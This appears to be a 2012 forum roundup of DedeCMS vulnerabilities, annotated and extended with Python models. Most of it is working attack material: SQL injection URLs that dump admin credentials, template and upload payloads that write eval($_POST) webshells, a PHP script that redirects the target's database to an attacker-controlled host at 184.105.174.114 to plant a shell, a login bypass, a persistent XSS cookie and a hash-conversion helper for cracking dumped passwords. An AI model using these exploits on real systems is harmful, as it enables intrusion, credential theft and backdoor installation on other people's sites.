DedeCMS vulnerability roundup

Posted 2012-10-18 10:42:14

Dedecms 5.6 rss.php injection vulnerability
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1
This is error-based injection through the _Cs[] array key: updatexml() is handed CONCAT(0x5b, uname, 0x3a, MID(pwd,4,16), 0x5d), which is not valid XPath, so the MySQL error message echoes [uname:<16 hash characters>] back in the response. MID(pwd,4,16) takes 16 characters starting at the 4th character of the stored 20-character hash, which is the standard 16-character MD5 (see the note under advancedsearch.php further down).
DedeCms v5.6 embedded malicious code execution vulnerability
Register a member account and upload a "software" item. In the local address (本地地址) field enter: a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
After publishing, viewing or editing the item executes the code.
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
This variant writes x.php (eC5waHA decodes to x.php, the second string to <?php eval($_POST[xiao])?>baidu), i.e. a one-line backdoor whose password is xiao.
Dede 5.6 GBK SQL injection vulnerability
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';

http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7
%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7 is the UTF-8 encoding of 涛声依旧; the trick depends on the site running the GBK build and re-encoding that input, hence the title.
DEDECMS (all versions) gotopage variable XSS vulnerability
1. Copy and paste the URL below into the browser to trigger the XSS and install the "XSS rootkit". Note that IE8/9 and similar block URL-borne XSS of this kind; the XSS filter has to be switched off.
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="
Decoded, the String.fromCharCode payload does nothing more than plant a persistent cookie: it sets document.cookie to gotopage="><script>alert(/xss rootkit!/)</script><x=" with a one-year expiry and then alerts "Xss Rootkit Install Successful !!!!". Because DedeCMS registers cookie values as variables just like GET parameters, and login.php reflects gotopage unescaped, that cookie re-supplies the payload on every later visit.
2. Close the browser; from now on any of the URLs below triggers our XSS, however you reach them.
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda

http://v57.demo.dedecms.com/dede/login.php

DeDeCMS (织梦) variable overwrite getshell
#!/usr/bin/php -w
<?php
// Variable-overwrite getshell against plus/mytag_js.php. The _COOKIE[GLOBALS][cfg_db*]
// parameters overwrite the site's database settings and point it at a MySQL server the
// attacker controls (184.105.174.114, exploit/90sec as posted) whose dede_mytag rows carry
// {dede:php} code that writes the shell (see the form-based variant further down).
error_reporting(E_ERROR);
set_time_limit(0);
print_r('
DEDEcms Variable Coverage
Exploit Author:
www.heixiaozi.com www.webvul.com
');
echo "\r\n";
if(!isset($argv[2])){
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url aid path
aid=1 shellpath /data/cache   aid=2 shellpath /   aid=3 shellpath /plus/
Example:
php '.$argv[0].' www.site.com 1 old
+---------------------------------------------------------------------------+
');
exit;
}
$url=$argv[1];                              // host name, no scheme
$aid=$argv[2];                              // which poisoned dede_mytag row to pull; decides the shell path
$path=isset($argv[3]) ? $argv[3] : '';      // sub-directory DedeCMS lives in, '' for the web root
$exp=Getshell($url,$aid,$path);
if (strpos($exp,"OK")>12){                  // the {dede:php} payload echoes "OK" after writing the file
echo "Exploit Success \n";
if($aid==1)echo "Shell:".$url."/$path/data/cache/fuck.php\n" ;
if($aid==2)echo "Shell:".$url."/$path/fuck.php\n" ;
if($aid==3)echo "Shell:".$url."/$path/plus/fuck.php\n";
}else{
echo "Exploit Failed \n";
}
function Getshell($url,$aid,$path){
$id=$aid;
$host=$url;
$port="80";
// Form body as posted: doaction is filler, the _COOKIE[GLOBALS][...] keys do the overwrite.
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
$data .= "Host: ".$host."\r\n";
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
//$data .= "Accept-Encoding: gzip,deflate\r\n";
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
$data .= "Connection: close\r\n";             // close, so the read loop below reaches EOF instead of hanging on keep-alive
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
$data .= $content."\r\n";
$ock=fsockopen($host,$port);
if (!$ock) {
echo "No response from ".$host."\n";
return '';
}
fwrite($ock,$data);
$exp='';
while (!feof($ock)) {                       // read the whole response; the original returned after the status line,
$exp.=fgets($ock, 1024);                    // so "OK" in the body was never seen
}
fclose($ock);
return $exp;
}
?>
DedeCms v5.6-5.7 unauthorised access vulnerability (straight into the admin backend)

http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root

Replace 织梦网站后台 with the site's backend directory and validate=dcug with the current captcha value, and you are logged straight into the backend. The _POST[GLOBALS][cfg_db*] parameters are the same GLOBALS overwrite used against mytag_js.php: the login looks the admin up in a MySQL server the attacker controls (116.255.183.90, root/r0t0 as posted), where admin/inimda is a valid account, so the captcha is the only check left.

Precondition: this only works once you know the backend path.

Dedecms (织梦) tag remote file write vulnerability
Precondition: you must have your own DedeCMS database ready, with this row inserted (the written content is left as the post shows it, an empty string; the shell body goes into that fwrite):
insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');

Then submit the form below (fill dbhost/dbuser/dbpwd/dbname with your own database) and the shell lands as 1.php in the same directory. Work out the mechanics yourself... Briefly: mytag_js.php loads the dede_mytag row with the given aid and renders it through the template engine, so once the cfg_db* overwrite points the site at your database, your {dede:php} block runs on the target.
<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction()">
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="提交" name="QuickSearchBtn"><br />
</form>
<script>
// Point the form at the target's mytag_js.php before it is submitted (the original defined this but never called it).
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>
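Why the nested key slips through, as an added Python model written for this page and not DedeCMS's own (PHP) code. It covers the two mechanisms that the form above and the variable-overwrite script earlier both depend on: PHP's bracket syntax turning a body field named _COOKIE[GLOBALS][cfg_dbhost] into nested arrays, and a register_globals-style loop that copies every key of $_GET, $_POST and $_COOKIE into the global scope after checking only the top-level keys of $_REQUEST against a cfg_/GLOBALS prefix filter. The filter regexes, the loop shape and the hardened recursive check are assumptions modelled on that pattern rather than quoted source; the sample body is the one the PHP script posts, with the host replaced.

```python
import re
from urllib.parse import parse_qsl

# Assumed filter of the vulnerable build: reserved prefixes, checked on top-level keys only.
RESERVED = re.compile(r"^(cfg_|GLOBALS)")
# Assumed hardened filter: also blocks the request-array names, applied at every depth.
RESERVED_HARDENED = re.compile(r"^(cfg_|GLOBALS|_GET|_POST|_COOKIE)")


def php_parse_body(body: str) -> dict:
    """Turn an x-www-form-urlencoded body into PHP-style nested arrays.

    'a[b][c]=1' becomes {'a': {'b': {'c': '1'}}}; 'a[]=1' appends under the
    next integer key, as PHP does.
    """
    out: dict = {}
    for raw_key, value in parse_qsl(body, keep_blank_values=True):
        m = re.fullmatch(r"([^\[]+)((?:\[[^\]]*\])*)", raw_key)
        if m is None:                       # malformed key: keep it verbatim
            out[raw_key] = value
            continue
        path = [m.group(1)] + re.findall(r"\[([^\]]*)\]", m.group(2))
        node = out
        for depth, part in enumerate(path):
            if part == "":
                part = str(len(node))       # a[] -> next index
            if depth == len(path) - 1:
                node[part] = value
            else:
                if not isinstance(node.get(part), dict):
                    node[part] = {}
                node = node[part]
    return out


def check_request(val, pattern: re.Pattern) -> None:
    """Hardened check: reject a reserved key name at any nesting depth."""
    if isinstance(val, dict):
        for k, v in val.items():
            if pattern.match(k):
                raise ValueError("Request var not allow!")
            check_request(v, pattern)


def register_request_vars(get: dict, post: dict, cookie: dict, hardened: bool = False) -> dict:
    """Emulate the register_globals loop: ${$_k} = $_v for _GET, _POST, _COOKIE in turn.

    Returns the resulting global symbol table. In the vulnerable shape only the
    top-level keys of $_REQUEST are filtered, so a POST key named _COOKIE passes,
    replaces the real cookie array once registered, and is then walked as
    $_COOKIE: its GLOBALS entry is registered as the GLOBALS array, carrying the
    attacker's cfg_db* values.
    """
    request = {**cookie, **get, **post}     # $_REQUEST
    if hardened:
        check_request(request, RESERVED_HARDENED)
    else:
        for k in request:
            if RESERVED.match(k):
                raise ValueError("Request var not allow!")
    scope = {
        "_GET": get, "_POST": post, "_COOKIE": cookie,
        "GLOBALS": {"cfg_dbhost": "localhost", "cfg_dbuser": "dede",
                    "cfg_dbpwd": "secret", "cfg_dbname": "dedecms"},
    }
    for name in ("_GET", "_POST", "_COOKIE"):
        for key, value in list(scope[name].items()):   # $$_request is re-read each round
            scope[key] = value                          # ${$_k} = $_v
    return scope


# Constructed sample: the body the PHP exploit above posts, host replaced by "target".
EXPLOIT_BODY = (
    "doaction=http%3A%2F%2Ftarget%2Fplus%2Fmytag_js.php%3Faid%3D1"
    "&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114"
    "&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit"
    "&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec"
    "&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit"
    "&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_"
    "&nocache=true&QuickSearchBtn=%CC%E1%BD%BB"
)


def effective_db_host(body: str, hardened: bool = False) -> str:
    """Where the site would connect after registering this POST body."""
    post = php_parse_body(body)
    scope = register_request_vars({}, post, {"PHPSESSID": "deadbeef"}, hardened)
    return scope["GLOBALS"]["cfg_dbhost"]


if __name__ == "__main__":
    print(effective_db_host(EXPLOIT_BODY))            # 184.105.174.114
    try:
        effective_db_host(EXPLOIT_BODY, hardened=True)
    except ValueError as e:
        print("hardened build:", e)
```

The point of the recursive check is that a prefix filter on key names is only as good as the depth it looks at: once a request array can be replaced by a request parameter, the second pass over it is effectively unfiltered.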

Dedecms <= V5.6 Final template execution vulnerability
1. Register a user, go into the member area, publish an article and upload an image. Then, in attachment management, replace the image with a template we craft ourselves. Say the image name is:
uploads/userup/2/12OMX04-15A.jpg

The template content is (if the image format is checked, prefix it with gif89a):
{dede:name runphp='yes'}
$fp = @fopen("1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}
2. Edit the article you just published, view the page source and build a form like this one (the templet and dede_addonfields fields near the end are the crafted part):
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1275972263" />

<div id="mainCp">
<h3 class="meTitle"><strong>Edit article</strong></h3>

<div class="postForm">
<label>Title:</label>
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>

<label>Tags:</label>
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(comma separated)

<label>Author:</label>
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>

<label>Category:</label>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test category</option>
</select> <span style="color:#F00">*</span>(coloured categories cannot be selected)

<label>My category:</label>
<select name='mtypesid' size='1'>
<option value='0'>Choose a category...</option>
<option value='1' class='option3' selected>hahahha</option>
</select>

<label>Summary:</label>
<textarea name="description" id="description">1111111</textarea>
(short description of the content)

<label>Thumbnail:</label>
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>

<!-- the crafted part: point the article template at the uploaded "image" and tell article_edit.php to save the templet field -->
<input type='text' name='templet' value="../uploads/userup/2/12OMX04-15A.jpg">
<input type='text' name='dede_addonfields' value="templet,htmltext;">
</div>

<!-- form action area -->
<h3 class="meTitle">Body</h3>

<div class="contentShow postForm">
<input type="hidden" id="body" name="body" value="&lt;div&gt;&lt;a href=&quot;http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg&quot; target=&quot;_blank&quot;&gt;&lt;img border=&quot;0&quot; alt=&quot;&quot; src=&quot;http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg&quot; width=&quot;1010&quot; height=&quot;456&quot; /&gt;&lt;/a&gt;&lt;/div&gt; &lt;p&gt;&lt;?phpinfo()?&gt;1111111&lt;/p&gt;" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>

<label>Captcha:</label>
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
<img src="http://127.0.0.1/dede/include/vdimgck.php" alt="Can't read it? Click to change" align="absmiddle" style="cursor:pointer" />

<button class="button2" type="submit">Submit</button>
<button class="button2 ml10" type="reset">Reset</button>
</div>

</div>

</form>

Submit; if it reports the edit succeeded, the template path has been changed. 3. Visit the edited article:
Assuming the article you just edited has aid 2, simply request
http://127.0.0.1/dede/plus/view.php?aid=2
and the webshell 1.php is generated in the plus directory.

DEDECMS Get Shell vulnerability (5.3/5.6)
Gif89a{dede:field name='toby57' runphp='yes'}
phpinfo();
{/dede:field}
Save this as 1.gif (the Gif89a prefix satisfies the image-format check), then build the form below to upload it:
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="aid" value="7" />
<input type="hidden" name="mediatype" value="1" />
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /><br />
<input type="hidden" name="dopost" value="save" />
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
<input name="addonfile" type="file" id="addonfile"/>
<button class="button2" type="submit" >Change</button>
</form>

Once uploaded, the image is stored as /uploads/userup/3/1.gif.
Publish an article, then build the edit form as follows (templet pointing at the uploaded gif, and dede_addonfields=templet so that field gets saved):

<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1282049150" />
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test</option>
</select>
<select name='mtypesid' size='1'>
<option value='0'>Choose a category...</option>
<option value='1' class='option3' selected>aa</option>
</select>
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
<input type='hidden' name='dede_addonfields' value="templet">
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
<button class="button2" type="submit">Submit</button>
</form>
Dedecms (织梦) V5.6 remote file deletion vulnerability

http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
oldface is not normalised before the unlink, so the ../ sequence walks out of the member's upload directory and deletes any file the web server user can remove (here the member-template logo).
Dedecms (织梦) V5.6 plus/carbuyaction.php local file inclusion vulnerability
http://www.test.com/plus/carbuya ... urn&code=../../
(The URL is truncated in the original post; code is the parameter that takes the traversal.)

DedeCms V5.6 plus/advancedsearch.php arbitrary SQL execution vulnerability
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
%23@__ is the URL-encoded #@__ table-prefix placeholder, which DedeCMS expands to the configured prefix (dede_ by default), so the statement dumps the admin table whatever prefix the site uses.
The stored password is the 32-character MD5 with the first 5 and last 7 characters removed, leaving 20 characters. To turn that into the standard 16-character MD5, drop 3 more from the front and 1 from the end.
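The hash arithmetic from the note above, and the MID(pwd,4,16) in the rss.php payload near the top of the post, implemented as an added Python example (mine, not DedeCMS code) so a dumped admin row can be turned into a crackable 16-character MD5 and a candidate password checked offline. That the stored value equals substr(md5(pwd),5,20) is an assumption consistent with the note; the error text in the main block is constructed in the shape of MySQL's XPATH syntax error.

```python
import hashlib
import re


def md5_hex(password: str) -> str:
    """Full 32-character hex MD5."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()


def dede_stored_hash(password: str) -> str:
    """The 20-character form the note describes: 32-char MD5 minus the first 5
    and last 7 characters (assumed to equal substr(md5($pwd), 5, 20))."""
    return md5_hex(password)[5:-7]


def dede20_to_md5_16(stored: str) -> str:
    """Front minus 3, back minus 1: the standard 16-character MD5 (characters
    8..23 of the full digest), which is what rainbow tables and crackers expect."""
    if len(stored) != 20:
        raise ValueError("expected the 20-character DedeCMS hash")
    return stored[3:-1]


def mysql_mid(s: str, pos: int, length: int) -> str:
    """MySQL MID(str, pos, len) with its 1-based pos, as used in the rss.php payload:
    MID(pwd,4,16) on the stored 20 characters lands on the same 16-character MD5."""
    return s[pos - 1:pos - 1 + length]


def parse_updatexml_leak(error_text: str):
    """Pull (uname, 16-char hash) out of the error the rss.php payload provokes.

    The payload builds CONCAT(0x5b, uname, 0x3a, MID(pwd,4,16), 0x5d), i.e.
    "[name:hash]"; updatexml() rejects it as XPath and echoes it. MySQL shows only
    the first 32 characters of the offending string, so the bracketed form has to
    stay short, which is why the payload leaks 16 characters and not the full hash.
    """
    m = re.search(r"\[([^:\]]+):([0-9a-f]{16})\]", error_text)
    return (m.group(1), m.group(2)) if m else None


def check_password(stored: str, candidate: str) -> bool:
    """Offline check of a candidate password against a dumped 20-character hash."""
    return dede_stored_hash(candidate) == stored


if __name__ == "__main__":
    # Constructed sample error text, shaped like MySQL's XPATH syntax error message.
    leak = "XPATH syntax error: '[admin:7a57a5a743894a0e]'"
    name, h16 = parse_updatexml_leak(leak)
    stored = dede_stored_hash("admin")
    print(name, h16, dede20_to_md5_16(stored) == h16, mysql_mid(stored, 4, 16) == h16)
```

A dumped 20-character value goes into dede20_to_md5_16() before being handed to a cracker; a value leaked through the rss.php error is already the 16-character form.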

Dedecms (织梦) 5.1 feedback_js.php injection vulnerability
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
Note the two levels of quoting: the outer UNION makes the selected arcurl value itself an injection string, which suggests feedback_js.php reuses that value unescaped in a second query; userid and pwd then come back in the 4th and 9th columns of the feedback rows.

Dedecms (织梦) select_soft_post.php uninitialised variable vulnerability
<html>
<head>
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
<body style="FONT-SIZE: 9pt">
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
<!-- With register_globals on, the cfg_* fields below overwrite the upload policy (php becomes an allowed type, the base dir is pushed up two levels) and newname fixes the stored file name. -->
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
<input type='hidden' name='activepath' value='/data/cache/' />
<input type='hidden' name='cfg_basedir' value='../../' />
<input type='hidden' name='cfg_imgtype' value='php' />
<input type='hidden' name='cfg_not_allowall' value='txt' />
<input type='hidden' name='cfg_softtype' value='php' />
<input type='hidden' name='cfg_mediatype' value='php' />
<input type='hidden' name='f' value='form1.enclosure' />
<input type='hidden' name='job' value='upload' />
<input type='hidden' name='newname' value='fly.php' />
Select U Shell <input type='file' name='uploadfile' size='25' />
<input type='submit' name='sb1' value='OK' />
</form>
<br />It's just a exp for the bug of Dedecms V55...<br />
Need register_globals = on...<br />
Fun the game,get a webshell at /data/cache/fly.php...<br />
</body>
</html>
Dedecms (织梦) 5.3 - 5.5 plus/digg_frame.php injection vulnerability
It combines a MySQL numeric overflow that raises an error with the fact that DedeCMS logs database errors into a PHP file whose header is not validated.
1. Visit:

http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
(URL truncated in the original post. %65 is "e", so the id value is 1024e1024, a double MySQL cannot parse; mid carries the PHP that closes the log file's comment block.)
The error message is displayed.

2. Visit
http://www.abc.com/data/mysql_error_trace.php and seeing the following proves the injection worked:
int(3) Error: Illegal double '1024e1024' value found during parsing
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
The leading int(3) is the var_dump(3) from the injected code: the trace file wraps each logged query in a PHP comment, the injected */ closes it early, and everything after it runs every time the file is requested.

3. Run test.html from dede.rar; its form action must be

<form action="http://www.abc.com/data/mysql_error_trace.php" enctype="application/x-www-form-urlencoded" method="post">
<!-- test.html itself is not in the post; the field below is implied by the injected eval($_POST[x]) -->
<textarea name="x"></textarea>
<input type="submit" value="OK" />
</form>

Seeing the step-2 output after pressing OK means the file trojan is in place.
Dedecms (织梦) plus/infosearch.php file injection vulnerability
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*
%cf is the classic wide-byte trick: on a GBK site the escaped quote becomes %cf%5c%27, MySQL reads %cf%5c as one double-byte character, and the quote is free again.